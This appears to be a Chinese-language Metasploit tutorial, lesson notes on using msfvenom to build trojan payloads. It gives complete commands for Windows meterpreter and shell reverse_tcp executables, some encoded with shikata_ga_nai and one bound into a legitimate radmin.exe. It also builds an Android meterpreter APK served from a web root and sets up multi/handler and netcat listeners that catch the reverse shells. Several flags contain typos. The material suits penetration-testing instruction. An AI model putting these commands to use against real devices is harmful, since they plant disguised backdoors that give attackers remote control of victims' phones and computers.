Metasploit进阶第四讲 生成Android apk文件
01 msfvenom基本参数
msfvenom介绍
承接上回,staged/unstage payload如何利用?
msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。
msfvenom基本参数
msfvenom -h
-p ->指定payload
-1 ->列出所有可用项
-f ->指定文件输出格式
-e ->指定编码格式
-a ->选择架构平台
-o ->选择文件输出路径,包含文件名
-s ->指定生成的payload最大大小
-b ->避免使用的字符
-I ->指定编码次数
-c ->添加自己的shellcode
-xxxx.exc -k ->捆绑文件到xxx.cxc
以下使用msfvenom分别是什么意思?
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-b ‘\×00xff' –I 3 –f exe -o abc.exe
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe
msfvenom生成apk文件
staged payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
R>/var/www/html/Lliang.apk
metasploit:
use exploit/multi/handler 加载模块
set payload android/meterpreter/reverse_tcp 选择Payload
set LHOST10.1.1.169这里的地址设置成我
们刚配置木马的IP地址
set LPORT4545这里的端口设置成刚才我们
配置木马所监听的端口
unstage payload:
msfvenom –p windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545
-f exe –o /var/www/html/shell-stageless.exe
metasploit:
use exploit/multi/handler加载模块
set payload windows/shell_reverse_tcp 选择Payload
unstage payload:
msfvenom -p windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545 -f exe -o /var/www/html/shell-stageless.exe
netcat:在两台电脑之润建立链接并返回两个数据流
nc -lyp 4545 -监听4545端口
-v/-vw 显示指令执行过程
-l 使用监听模式,管控传入的资料
-p 设置本地主机使用的通信端口
staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload